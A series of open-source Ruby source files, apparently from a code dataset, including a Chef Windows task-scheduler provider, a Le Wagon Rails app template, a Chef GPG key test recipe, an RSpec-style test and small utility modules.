cmd, *args = Chef::Util::PathHelper.split_args(new_resource.command)
new_resource.command = cmd
new_resource.command_arguments = args.join(" ")
end
def set_start_day_and_time
new_resource.start_day = Time.now.strftime("%m/%d/%Y") unless new_resource.start_day
new_resource.start_time = Time.now.strftime("%H:%M") unless new_resource.start_time
end
def update_task(task)
converge_by("#{new_resource} task updated") do
task.set_account_information(new_resource.user, new_resource.password, new_resource.interactive_enabled)
task.application_name = new_resource.command if new_resource.command
task.parameters = new_resource.command_arguments if new_resource.command_arguments
task.working_directory = new_resource.cwd if new_resource.cwd
task.trigger = trigger unless new_resource.frequency == :none
task.configure_settings(config_settings)
task.creator = new_resource.user
task.description = new_resource.description unless new_resource.description.nil?
task.configure_principals(principal_settings)
end
end
def trigger
start_month, start_day, start_year = new_resource.start_day.to_s.split("/")
start_hour, start_minute = new_resource.start_time.to_s.split(":")
# TODO currently end_month, end_year and end_year needs to be set to 0. If not set win32-taskscheduler throwing nil into integer error.
trigger_hash = {
start_year: start_year.to_i,
start_month: start_month.to_i,
start_day: start_day.to_i,
start_hour: start_hour.to_i,
start_minute: start_minute.to_i,
end_month: 0,
end_day: 0,
end_year: 0,
trigger_type: trigger_type,
type: type,
random_minutes_interval: new_resource.random_delay,
}
if new_resource.frequency == :minute
trigger_hash[:minutes_interval] = new_resource.frequency_modifier
end
if new_resource.frequency == :hourly
minutes = convert_hours_in_minutes(new_resource.frequency_modifier.to_i)
trigger_hash[:minutes_interval] = minutes
end
if new_resource.minutes_interval
trigger_hash[:minutes_interval] = new_resource.minutes_interval
end
if new_resource.minutes_duration
trigger_hash[:minutes_duration] = new_resource.minutes_duration
end
if trigger_type == TaskScheduler::MONTHLYDOW && frequency_modifier_contains_last_week?(new_resource.frequency_modifier)
trigger_hash[:run_on_last_week_of_month] = true
else
trigger_hash[:run_on_last_week_of_month] = false
end
if trigger_type == TaskScheduler::MONTHLYDATE && day_includes_last_or_lastday?(new_resource.day)
trigger_hash[:run_on_last_day_of_month] = true
else
trigger_hash[:run_on_last_day_of_month] = false
end
trigger_hash
end
def frequency_modifier_contains_last_week?(frequency_modifier)
frequency_modifier = frequency_modifier.to_s.split(",")
frequency_modifier.map! { |value| value.strip.upcase }
frequency_modifier.include?("LAST")
end
def day_includes_last_or_lastday?(day)
day = day.to_s.split(",")
day.map! { |value| value.strip.upcase }
day.include?("LAST") || day.include?("LASTDAY")
end
def convert_hours_in_minutes(hours)
hours.to_i * 60 if hours
end
# TODO : Try to optimize this method
# known issue : Since start_day and time is not mandatory while updating weekly frequency for which start_day is not mentioned by user idempotency
# is not getting maintained as new_resource.start_day is nil and we fetch the day of week from start_day to set and its currently coming as nil and don't match with current_task
def task_needs_update?(task)
flag = false
if new_resource.frequency == :none
flag = (task.author != new_resource.user ||
task.application_name != new_resource.command ||
description_needs_update?(task) ||
task.parameters != new_resource.command_arguments.to_s ||
task.principals[:run_level] != run_level ||
task.settings[:disallow_start_if_on_batteries] != new_resource.disallow_start_if_on_batteries ||
task.settings[:stop_if_going_on_batteries] != new_resource.stop_if_going_on_batteries ||
task.settings[:start_when_available] != new_resource.start_when_available)
else
current_task_trigger = task.trigger(0)
new_task_trigger = trigger
flag = (ISO8601::Duration.new(task.idle_settings[:idle_duration])) != (ISO8601::Duration.new(new_resource.idle_time * 60)) if new_resource.frequency == :on_idle
flag = (ISO8601::Duration.new(task.execution_time_limit)) != (ISO8601::Duration.new(new_resource.execution_time_limit * 60)) unless new_resource.execution_time_limit.nil?
# if trigger not found updating the task to add the trigger
if current_task_trigger.nil?
flag = true
else
flag = true if start_day_updated?(current_task_trigger, new_task_trigger) == true ||
start_time_updated?(current_task_trigger, new_task_trigger) == true ||
current_task_trigger[:trigger_type] != new_task_trigger[:trigger_type] ||
current_task_trigger[:type] != new_task_trigger[:type] ||
current_task_trigger[:random_minutes_interval].to_i != new_task_trigger[:random_minutes_interval].to_i ||
current_task_trigger[:minutes_interval].to_i != new_task_trigger[:minutes_interval].to_i ||
task.author.to_s.casecmp(new_resource.user.to_s) != 0 ||
task.application_name != new_resource.command ||
description_needs_update?(task) ||
task.parameters != new_resource.command_arguments.to_s ||
task.working_directory != new_resource.cwd.to_s ||
task.principals[:logon_type] != logon_type ||
task.principals[:run_level] != run_level ||
PRIORITY[task.priority] != new_resource.priority ||
task.settings[:disallow_start_if_on_batteries] != new_resource.disallow_start_if_on_batteries ||
task.settings[:stop_if_going_on_batteries] != new_resource.stop_if_going_on_batteries ||
task.settings[:start_when_available] != new_resource.start_when_available
if trigger_type == TaskScheduler::MONTHLYDATE
flag = true if current_task_trigger[:run_on_last_day_of_month] != new_task_trigger[:run_on_last_day_of_month]
end
if trigger_type == TaskScheduler::MONTHLYDOW
flag = true if current_task_trigger[:run_on_last_week_of_month] != new_task_trigger[:run_on_last_week_of_month]
end
end
end
flag
end
def start_day_updated?(current_task_trigger, new_task_trigger)
( new_resource.start_day && (current_task_trigger[:start_year].to_i != new_task_trigger[:start_year] ||
current_task_trigger[:start_month].to_i != new_task_trigger[:start_month] ||
current_task_trigger[:start_day].to_i != new_task_trigger[:start_day]) )
end
def start_time_updated?(current_task_trigger, new_task_trigger)
( new_resource.start_time && ( current_task_trigger[:start_hour].to_i != new_task_trigger[:start_hour] ||
current_task_trigger[:start_minute].to_i != new_task_trigger[:start_minute] ) )
end
def trigger_type
case new_resource.frequency
when :once, :minute, :hourly
TaskScheduler::ONCE
when :daily
TaskScheduler::DAILY
when :weekly
TaskScheduler::WEEKLY
when :monthly
# If frequency modifier is set with frequency :monthly we are setting taskscheduler as monthlydow
# Ref https://msdn.microsoft.com/en-us/library/windows/desktop/aa382061(v=vs.85).aspx
new_resource.frequency_modifier.to_i.between?(1, 12) ? TaskScheduler::MONTHLYDATE : TaskScheduler::MONTHLYDOW
when :on_idle
TaskScheduler::ON_IDLE
when :onstart
TaskScheduler::AT_SYSTEMSTART
when :on_logon
TaskScheduler::AT_LOGON
else
raise ArgumentError, "Please set frequency"
end
end
def type
case trigger_type
when TaskScheduler::ONCE
{ once: nil }
when TaskScheduler::DAILY
{ days_interval: new_resource.frequency_modifier.to_i }
when TaskScheduler::WEEKLY
{ weeks_interval: new_resource.frequency_modifier.to_i, days_of_week: days_of_week.to_i }
when TaskScheduler::MONTHLYDATE
{ months: months_of_year.to_i, days: days_of_month.to_i }
when TaskScheduler::MONTHLYDOW
{ months: months_of_year.to_i, days_of_week: days_of_week.to_i, weeks_of_month: weeks_of_month.to_i }
when TaskScheduler::ON_IDLE
# TODO: handle option for this trigger
when TaskScheduler::AT_LOGON
# TODO: handle option for this trigger
when TaskScheduler::AT_SYSTEMSTART
# TODO: handle option for this trigger
end
end
# Deleting last from the array of weeks of month since last week is handled in :run_on_last_week_of_month parameter.
def weeks_of_month
weeks_of_month = []
if new_resource.frequency_modifier
weeks = new_resource.frequency_modifier.split(",")
weeks.map! { |week| week.to_s.strip.upcase }
weeks.delete("LAST") if weeks.include?("LAST")
weeks_of_month = get_binary_values_from_constants(weeks, WEEKS_OF_MONTH)
end
weeks_of_month
end
# Deleting the "LAST" and "LASTDAY" from days since last day is handled in :run_on_last_day_of_month parameter.
def days_of_month
days_of_month = []
if new_resource.day
days = new_resource.day.to_s.split(",")
days.map! { |day| day.to_s.strip.upcase }
days.delete("LAST") if days.include?("LAST")
days.delete("LASTDAY") if days.include?("LASTDAY")
if days - (1..31).to_a
days.each do |day|
days_of_month << DAYS_OF_MONTH[day.to_i]
end
days_of_month = days_of_month.size > 1 ? days_of_month.inject(:|) : days_of_month[0]
end
else
days_of_month = DAYS_OF_MONTH[1]
end
days_of_month
end
def days_of_week
if new_resource.day
# this line of code is just to support backward compatibility of wild card *
new_resource.day = "mon, tue, wed, thu, fri, sat, sun" if new_resource.day == "*" && new_resource.frequency == :weekly
days = new_resource.day.to_s.split(",")
days.map! { |day| day.to_s.strip.upcase }
weeks_days = get_binary_values_from_constants(days, DAYS_OF_WEEK)
else
# following condition will make the frequency :weekly idempotent if start_day is not provided by user setting day as the current_resource day
if (current_resource) && (current_resource.task) && (current_resource.task.trigger(0)[:type][:days_of_week]) && (new_resource.start_day.nil?)
weeks_days = current_resource.task.trigger(0)[:type][:days_of_week]
else
day = get_day(new_resource.start_day).to_sym if new_resource.start_day
DAYS_OF_WEEK[day]
end
end
end
def months_of_year
months_of_year = []
if new_resource.frequency_modifier.to_i.between?(1, 12) && !(new_resource.months)
new_resource.months = set_months(new_resource.frequency_modifier.to_i)
end
if new_resource.months
# this line of code is just to support backward compatibility of wild card *
new_resource.months = "jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec" if new_resource.months == "*" && new_resource.frequency == :monthly
months = new_resource.months.split(",")
months.map! { |month| month.to_s.strip.upcase }
months_of_year = get_binary_values_from_constants(months, MONTHS)
else
MONTHS.each do |key, value|
months_of_year << MONTHS[key]
end
months_of_year = months_of_year.inject(:|)
end
months_of_year
end
# This values are set for frequency_modifier set as 1-12
# This is to give backward compatibility validated this values with earlier code and running schtask.exe
# Used this as reference https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks#d-dayday--
def set_months(frequency_modifier)
case frequency_modifier
when 1
"jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec"
when 2
"feb, apr, jun, aug, oct, dec"
when 3
"mar, jun, sep, dec"
when 4
"apr, aug, dec"
when 5
"may, oct"
when 6
"jun, dec"
when 7
"jul"
when 8
"aug"
when 9
"sep"
when 10
"oct"
when 11
"nov"
when 12
"dec"
end
end
def get_binary_values_from_constants(array_values, constant)
data = []
array_values.each do |value|
value = value.to_sym
data << constant[value]
end
data.size > 1 ? data.inject(:|) : data[0]
end
def run_level
case new_resource.run_level
when :highest
TaskScheduler::TASK_RUNLEVEL_HIGHEST
when :limited
TaskScheduler::TASK_RUNLEVEL_LUA
end
end
# TODO: while creating the configuration settings win32-taskscheduler it accepts execution time limit values in ISO8601 format
def config_settings
settings = {
execution_time_limit: new_resource.execution_time_limit,
enabled: true,
}
settings[:idle_duration] = new_resource.idle_time if new_resource.idle_time
settings[:run_only_if_idle] = true if new_resource.idle_time
settings[:priority] = new_resource.priority
settings[:disallow_start_if_on_batteries] = new_resource.disallow_start_if_on_batteries
settings[:stop_if_going_on_batteries] = new_resource.stop_if_going_on_batteries
settings[:start_when_available] = new_resource.start_when_available
settings
end
def principal_settings
settings = {}
settings[:run_level] = run_level
settings[:logon_type] = logon_type
settings
end
def description_needs_update?(task)
task.description != new_resource.description unless new_resource.description.nil?
end
def logon_type
# Ref: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383566(v=vs.85).aspx
# if nothing is passed as logon_type the TASK_LOGON_SERVICE_ACCOUNT is getting set as default so using that for comparision.
user_id = new_resource.user.to_s
password = new_resource.password.to_s
if Chef::ReservedNames::Win32::Security::SID.service_account_user?(user_id)
TaskScheduler::TASK_LOGON_SERVICE_ACCOUNT
elsif Chef::ReservedNames::Win32::Security::SID.group_user?(user_id)
TaskScheduler::TASK_LOGON_GROUP
elsif !user_id.empty? && !password.empty?
if new_resource.interactive_enabled
TaskScheduler::TASK_LOGON_INTERACTIVE_TOKEN
else
TaskScheduler::TASK_LOGON_PASSWORD
end
else
TaskScheduler::TASK_LOGON_INTERACTIVE_TOKEN
end
end
# This method checks if task and command properties exist since those two are mandatory properties to create a schedules task.
def basic_validation
validate = []
validate << "Command" if new_resource.command.nil? || new_resource.command.empty?
validate << "Task Name" if new_resource.task_name.nil? || new_resource.task_name.empty?
return true if validate.empty?
raise Chef::Exceptions::ValidationFailed.new "Value for '#{validate.join(", ")}' option cannot be empty"
end
# rubocop:disable Style/StringLiteralsInInterpolation
def run_schtasks(task_action, options = {})
cmd = "schtasks /#{task_action} /TN \"#{new_resource.task_name}\" "
options.each_key do |option|
unless option == "TR"
cmd += "/#{option} "
cmd += "\"#{options[option].to_s.gsub('"', "\\\"")}\" " unless options[option] == ""
end
end
# Appending Task Run [TR] option at the end since appending causing sometimes to append other options in option["TR"] value
if options["TR"]
cmd += "/TR \"#{options["TR"]} \" " unless task_action == "DELETE"
end
logger.trace("running: ")
logger.trace(" #{cmd}")
shell_out!(cmd, returns: [0])
end
# rubocop:enable Style/StringLiteralsInInterpolation
def get_day(date)
Date.strptime(date, "%m/%d/%Y").strftime("%a").upcase
end
end
end
end
end
| 44.294953 | 185 | 0.619592 |
4a48a735b382382fb8073d0d5f10859743c1b26a | 8,035 | run "if uname | grep -q 'Darwin'; then pgrep spring | xargs kill -9; fi"
# GEMFILE
########################################
inject_into_file 'Gemfile', before: 'group :development, :test do' do
<<~RUBY
gem 'devise'
gem 'autoprefixer-rails', '10.2.5'
gem 'font-awesome-sass'
gem 'simple_form'
RUBY
end
inject_into_file 'Gemfile', after: 'group :development, :test do' do
<<-RUBY
gem 'pry-byebug'
gem 'pry-rails'
gem 'dotenv-rails'
RUBY
end
gsub_file('Gemfile', /# gem 'redis'/, "gem 'redis'")
# IRB conf file
########################################
irbrc = '
if defined?(Rails)
banner = ''
if Rails.env.production?
banner = "\e[41;97;1m prod \e[0m "
elsif Rails.env.staging?
banner = "\e[43;97;1m staging \e[0m "
end
IRB.conf[:PROMPT][:CUSTOM] = IRB.conf[:PROMPT][:DEFAULT].merge(
PROMPT_I: "#{banner}#{IRB.conf[:PROMPT][:DEFAULT][:PROMPT_I]}"
)
IRB.conf[:PROMPT_MODE] = :CUSTOM
end
'
file '.irbrc', irbrc.strip
# Clevercloud conf file
########################################
file 'clevercloud/ruby.json', <<~EOF
{
"deploy": {
"rakegoals": ["assets:precompile", "db:migrate"]
}
}
EOF
# Database conf file
########################################
db_production_conf = <<~EOF
production:
<<: *default
url: <%= ENV['POSTGRESQL_ADDON_URI'] %>
EOF
gsub_file('config/database.yml', /^production:.*\z/m, db_production_conf)
# Assets
########################################
run 'rm -rf app/assets/stylesheets'
run 'rm -rf vendor'
run 'curl -L https://github.com/lewagon/rails-stylesheets/archive/master.zip > stylesheets.zip'
run 'unzip stylesheets.zip -d app/assets && rm stylesheets.zip && mv app/assets/rails-stylesheets-master app/assets/stylesheets'
# Dev environment
########################################
gsub_file('config/environments/development.rb', /config\.assets\.debug.*/, 'config.assets.debug = false')
# Layout
########################################
if Rails.version < "6"
scripts = <<~HTML
<%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload', defer: true %>
<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %>
HTML
gsub_file('app/views/layouts/application.html.erb', "<%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>", scripts)
end
gsub_file('app/views/layouts/application.html.erb', "<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %>", "<%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload', defer: true %>")
style = <<~HTML
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>
HTML
gsub_file('app/views/layouts/application.html.erb', "<%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>", style)
# Flashes
########################################
file 'app/views/shared/_flashes.html.erb', <<~HTML
<% if notice %>
<div class="alert alert-info alert-dismissible fade show m-1" role="alert">
<%= notice %>
<button type="button" class="close" data-dismiss="alert" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<% end %>
<% if alert %>
<div class="alert alert-warning alert-dismissible fade show m-1" role="alert">
<%= alert %>
<button type="button" class="close" data-dismiss="alert" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<% end %>
HTML
run 'curl -L https://github.com/lewagon/awesome-navbars/raw/master/templates/_navbar_wagon.html.erb > app/views/shared/_navbar.html.erb'
inject_into_file 'app/views/layouts/application.html.erb', after: '<body>' do
<<-HTML
<%= render 'shared/navbar' %>
<%= render 'shared/flashes' %>
HTML
end
# README
########################################
markdown_file_content = <<~MARKDOWN
Rails app generated with [lewagon/rails-templates](https://github.com/lewagon/rails-templates), created by the [Le Wagon coding bootcamp](https://www.lewagon.com) team.
MARKDOWN
file 'README.md', markdown_file_content, force: true
# Generators
########################################
generators = <<~RUBY
config.generators do |generate|
generate.assets false
generate.helper false
generate.test_framework :test_unit, fixture: false
end
RUBY
environment generators
########################################
# AFTER BUNDLE
########################################
after_bundle do
# Generators: db + simple form + pages controller
########################################
rails_command 'db:drop db:create db:migrate'
generate('simple_form:install', '--bootstrap')
generate(:controller, 'pages', 'home', '--skip-routes', '--no-test-framework')
# Routes
########################################
route "root to: 'pages#home'"
# Git ignore
########################################
append_file '.gitignore', <<~TXT
# Ignore .env file containing credentials.
.env*
# Ignore Mac and Linux file system files
*.swp
.DS_Store
TXT
# Devise install + user
########################################
generate('devise:install')
generate('devise', 'User')
# App controller
########################################
run 'rm app/controllers/application_controller.rb'
file 'app/controllers/application_controller.rb', <<~RUBY
class ApplicationController < ActionController::Base
#{ "protect_from_forgery with: :exception\n" if Rails.version < "5.2"} before_action :authenticate_user!
end
RUBY
# migrate + devise views
########################################
rails_command 'db:migrate'
generate('devise:views')
# Pages Controller
########################################
run 'rm app/controllers/pages_controller.rb'
file 'app/controllers/pages_controller.rb', <<~RUBY
class PagesController < ApplicationController
skip_before_action :authenticate_user!, only: [ :home ]
def home
end
end
RUBY
# Environments
########################################
environment 'config.action_mailer.default_url_options = { host: "http://localhost:3000" }', env: 'development'
environment 'config.action_mailer.default_url_options = { host: "http://TODO_PUT_YOUR_DOMAIN_HERE" }', env: 'production'
# Webpacker / Yarn
########################################
run 'yarn add popper.js jquery [email protected]'
append_file 'app/javascript/packs/application.js', <<~JS
// ----------------------------------------------------
// Note(lewagon): ABOVE IS RAILS DEFAULT CONFIGURATION
// WRITE YOUR OWN JS STARTING FROM HERE 👇
// ----------------------------------------------------
// External imports
import "bootstrap";
// Internal imports, e.g:
// import { initSelect2 } from '../components/init_select2';
document.addEventListener('turbolinks:load', () => {
// Call your functions here, e.g:
// initSelect2();
});
JS
inject_into_file 'config/webpack/environment.js', before: 'module.exports' do
<<~JS
const webpack = require('webpack');
// Preventing Babel from transpiling NodeModules packages
environment.loaders.delete('nodeModules');
// Bootstrap 4 has a dependency over jQuery & Popper.js:
environment.plugins.prepend('Provide',
new webpack.ProvidePlugin({
$: 'jquery',
jQuery: 'jquery',
Popper: ['popper.js', 'default']
})
);
JS
end
# Dotenv
########################################
run 'touch .env'
# Rubocop
########################################
run 'curl -L https://raw.githubusercontent.com/lewagon/rails-templates/master/.rubocop.yml > .rubocop.yml'
# Git
########################################
git add: '.'
git commit: "-m 'Initial commit with devise template from https://github.com/lewagon/rails-templates'"
end
| 30.551331 | 222 | 0.581207 |
397cd210703e8ce4aa1cb121d1dbca4c63e45f32 | 1,701 | file '/tmp/dummy.key' do
content <<EOF
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.14 (GNU/Linux)
mQENBFr5hf8BCACzqYz7Hz0Bg1f9kba0PKTXSTEY7Tjq1HNJL36n5gURzq0487vo
ueqzRLI2LMqcnxBeHC1M4TSe+6BJHzAQZwe6n18zMVvOJCVm2ffJXc+cmKkxSYow
AmhkYCiN1gHVAZ54E+9TWPatbEnnggaa10h1hC6+nyQXED5pJrCahRjvxDjP+R5b
AgamvRsBFZG/48iHX9HdK8ytPx31fTpWKRd+2xYd0A7UOFjr1n7kD7j1vJDARvsk
P1jJKK/Nbp37cU2IzMavdE0mUi05lzE4n0HRZAquHT0mg/xRvB6cV6KRf0ekmV4A
W8hnbvdd2NcllPNhBvQnMXctpcymdEFxYoxrABEBAAG0UUNoZWYgR2VuZXJhdGVk
IERlZmF1bHQgKGR1bW15KSAoZ2VuZXJhdGVkIGJ5IENoZWYpIDxkZWZhdWx0LWNl
bnRvcy02QGV4YW1wbGUuY29tPokBOAQTAQIAIgUCWvmF/wIbLwYLCQgHAwIGFQgC
CQoLBBYCAwECHgECF4AACgkQlkcg/0cPTtukQAf/cRKkm+oFBj6iOJV5BF4eWDNq
SWl8NXgzOS+a8/WmNPat6yCtzIeLr8ihe2E7fSGFrtquPon7uJIknLVoKPR9nJn2
NbJIGX6a2mwdvO8aFYauHFovabz9IvQ20fGd/zVPWTiC0X+TPTap0oS039qpe7Jw
I4DnMK9ALc32Gc8QUDyISsPjhR6zRLcQd1opEA3ueHom9606ZMTGqJVsP8vNTefI
uu6FWzOd2gJUfkaM5affO2Sl/myb4OW5ZQWkmKEBoAgmAIw9mkiTJ936u5agBdG6
N6kKnBoIj8S5wCsG3s9TUOIHc4jXbwmwXgKh4d7f88gzBLB23xz2TVkqVczmHA==
=/FUl
-----END PGP PUBLIC KEY BLOCK-----
EOF
end
gpg_key 'import Dummy key to root keychain' do
user 'root'
name_real 'dummy'
key_file '/tmp/dummy.key'
action :import
not_if { ::File.exist?('/tmp/guard.txt') }
end
gpg_key 'delete public Dummy key' do
user 'root'
name_real 'dummy'
key_fingerprint '7877AF01696A73C4D02176F2964720FF470F4EDB'
action :delete_public_key
not_if { ::File.exist?('/tmp/guard.txt') }
end
# This set of actions (add then delete) will always trigger.
# For the purposes of testing we'll stick this file on disk
# so we know we've done it.
file '/tmp/guard.txt' do
content 'I am here to stop this resource from always firing'
end
| 36.191489 | 64 | 0.843034 |
79a61cff2c1eada4fb2bd7c29b30897181f0447c | 1,854 | require_relative '../../../../test_helper'
module Troo
module Commands
describe Show do
let(:described_class) { Show }
let(:klass) { stub(type: :resource_type) }
let(:id) {}
let(:type) { :card }
let(:id) { '1' }
let(:default) { false }
let(:resource) {}
let(:presenter) { stub }
before do
API::Client.stubs(:perform)
@card = Fabricate.build(:card, default: default)
klass.stubs(:retrieve).returns(resource)
Presenters::Card.stubs(:new).returns(presenter)
presenter.stubs(:show).returns(@card.name)
end
after { database_cleanup }
describe '.dispatch' do
subject { described_class.dispatch(klass, id) }
it { subject.must_be_instance_of(String) }
context 'when a resource ID is provided' do
context 'and the resource exists' do
let(:resource) { @card }
it 'presents the cards' do
subject.must_match(/#{@card.name}/)
end
end
context 'but the resource does not exist' do
it 'returns a polite message' do
subject.must_match(/cannot be found/)
end
end
end
context 'when a resource ID is not provided' do
let(:id) {}
context 'and a default resource is set' do
let(:default) { true }
let(:resource) { @card }
it 'presents the cards' do
subject.must_match(/#{@card.name}/)
end
end
context 'and a default resource is not set' do
it 'returns a polite message' do
subject.must_match(/to set a default/)
end
end
end
end
end
end
end
| 27.264706 | 58 | 0.516181 |
f75bd642e10957c9580a2c5a090ddf6aa12d53b4 | 209 | class CreateBookMarks < ActiveRecord::Migration
def change
create_table :book_marks do |t|
t.string :name
t.string :url
t.string :note
t.timestamps null: false
end
end
end
| 17.416667 | 47 | 0.650718 |
bf3ceeb039aeb604d08d5091fcb3f9dc8f671e78 | 682 | # frozen_string_literal: true
module Strings
module Fold
LINE_BREAK = "(\r\n+|\r+|\n+|\t+)".freeze
# Fold a multiline text into a single line string
#
# @example
# fold("\tfoo \r\n\n bar") # => "foo bar"
#
# @param [String] text
#
# @param [String] separator
# the separators to be removed from the text, default: (\r\n+|\r+|\n+|\t+)
#
# @return [String]
#
# @api public
def fold(text, separator = LINE_BREAK)
text.gsub(/([ ]+)#{separator}/, "\\1")
.gsub(/#{separator}(?<space>[ ]+)/, "\\k<space>")
.gsub(/#{separator}/, ' ')
end
module_function :fold
end # Fold
end # Strings
| 24.357143 | 80 | 0.530792 |
f72e3e9454d613331a5afd38765e6a1883398adc | 1,712 | # Copyright © 2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class RemoveForeignKeyUsers < ActiveRecord::Migration[5.1]
def change
remove_reference(:research_masters, :user, index: true, foreign_key: true)
end
end
| 65.846154 | 146 | 0.794393 |
1afb151bcba03d80d9241a451ec46da2d3a24116 | 1,367 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2018_06_01
module Models
#
# Describes the parameters of ephemeral disk settings that can be specified
# for operating system disk. <br><br> NOTE: The ephemeral disk settings can
# only be specified for managed disk.
#
class DiffDiskSettings
include MsRestAzure
# @return [DiffDiskOptions] Specifies the ephemeral disk settings for
# operating system disk. Possible values include: 'Local'
attr_accessor :option
#
# Mapper for DiffDiskSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'DiffDiskSettings',
type: {
name: 'Composite',
class_name: 'DiffDiskSettings',
model_properties: {
option: {
client_side_validation: true,
required: false,
serialized_name: 'option',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.34 | 79 | 0.58376 |
e96decb27f4457cae4ee2d317e2cda6aa78f50aa | 725 | MRuby.each_target do
current_dir = File.dirname(__FILE__)
relative_from_root = File.dirname(__FILE__).relative_path_from(MRUBY_ROOT)
current_build_dir = "#{build_dir}/#{relative_from_root}"
self.libmruby_objs << objfile("#{current_build_dir}/mrblib")
file objfile("#{current_build_dir}/mrblib") => "#{current_build_dir}/mrblib.c"
file "#{current_build_dir}/mrblib.c" => [mrbcfile, __FILE__] + Dir.glob("#{current_dir}/*.rb").sort do |t|
_, _, *rbfiles = t.prerequisites
FileUtils.mkdir_p File.dirname(t.name)
open(t.name, 'w') do |f|
_pp "GEN", "*.rb", "#{t.name.relative_path}"
f.puts File.read("#{current_dir}/init_mrblib.c")
mrbc.run f, rbfiles, 'mrblib_irep'
end
end
end
| 38.157895 | 108 | 0.686897 |
d580ae87dcc8fdcecbefc141145ba16a5c62b968 | 1,287 | class Lesspipe < Formula
desc "Input filter for the pager less"
homepage "https://www-zeuthen.desy.de/~friebel/unix/lesspipe.html"
url "https://downloads.sourceforge.net/project/lesspipe/lesspipe/1.82/lesspipe-1.82.tar.gz"
sha256 "3fd345b15d46cc8fb0fb1d625bf8d881b0637abc34d15df45243fd4e5a8f4241"
bottle do
cellar :any
sha256 "3a8e56f9b9b38d291d57f3a702e0dfb488814fb4686594084aa10a97f0cf2448" => :yosemite
sha256 "f33d17225509888d6193b1c5bac74577168d57cccd274065d195c9661774c68a" => :mavericks
sha256 "201d33d2ae2aff83e00bbcea23bf872f2a20938ba194d175426837fc041117c0" => :mountain_lion
end
option "with-syntax-highlighting", "Build with syntax highlighting"
deprecated_option "syntax-highlighting" => "with-syntax-highlighting"
def install
if build.with? "syntax-highlighting"
inreplace "configure", %q($ifsyntax = "\L$ifsyntax";), %q($ifsyntax = "\Ly";)
end
system "./configure", "--prefix=#{prefix}", "--yes"
man1.mkpath
system "make", "install"
end
test do
touch "file1.txt"
touch "file2.txt"
system "tar", "-cvzf", "homebrew.tar.gz", "file1.txt", "file2.txt"
assert File.exist?("homebrew.tar.gz")
assert_match /file2.txt/, shell_output("tar tvzf homebrew.tar.gz | #{bin}/tarcolor")
end
end
| 34.783784 | 95 | 0.72805 |
33d0159553a776a1e8a457d3d97f16993fbe539c | 100 | # frozen_string_literal: true
module Authentication
end
require 'authentication/subject_receiver'
| 14.285714 | 41 | 0.85 |
217240d5525a35969a42da66372b3ff5c735cbfa | 173 | Rails.application.config.content_security_policy do |policy|
policy.connect_src :self, :http, "http://localhost:3035", "ws://localhost:3035" if Rails.env.development?
end
| 43.25 | 107 | 0.774566 |
f7e2bb2256559a6ee9f83473d06f07379529d6ef | 1,100 | require("pry")
class Train
attr_writer(:train_name)
def initialize(attributes)
@train_name = attributes.fetch(:train_name)
end
def self.all
returned_trains = DB.exec("SELECT * FROM train;")
trains = []
returned_trains.each() do |train|
name = train.fetch("name")
train_id = train.fetch("id").to_i() # The information comes out of the database as a string.
unless name == nil
trains.push({:train_name => name, :train_id => train_id})
# trains.push(Train.new({:train_name => name}))
end
end
trains
end
def save
DB.exec("INSERT INTO train (name) VALUES ('#{@train_name}');")
end
# def self.sort
# returned_sorted_lists = DB.exec("SELECT * FROM tasks ORDER BY due_date;")
# @lists = []
# returned_sorted_lists.each() do |list|
# description = list.fetch("description")
# list_id = list.fetch("list_id").to_i()
# due_date = list.fetch("due_date")
# @lists.push(Task.new({:description => description, :list_id => list_id, :due_date => due_date}))
# end
# @lists
# end
end
| 26.829268 | 104 | 0.623636 |
e25d42626b91b67298f961f38c5610806c33052f | 825 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'file_chooser'
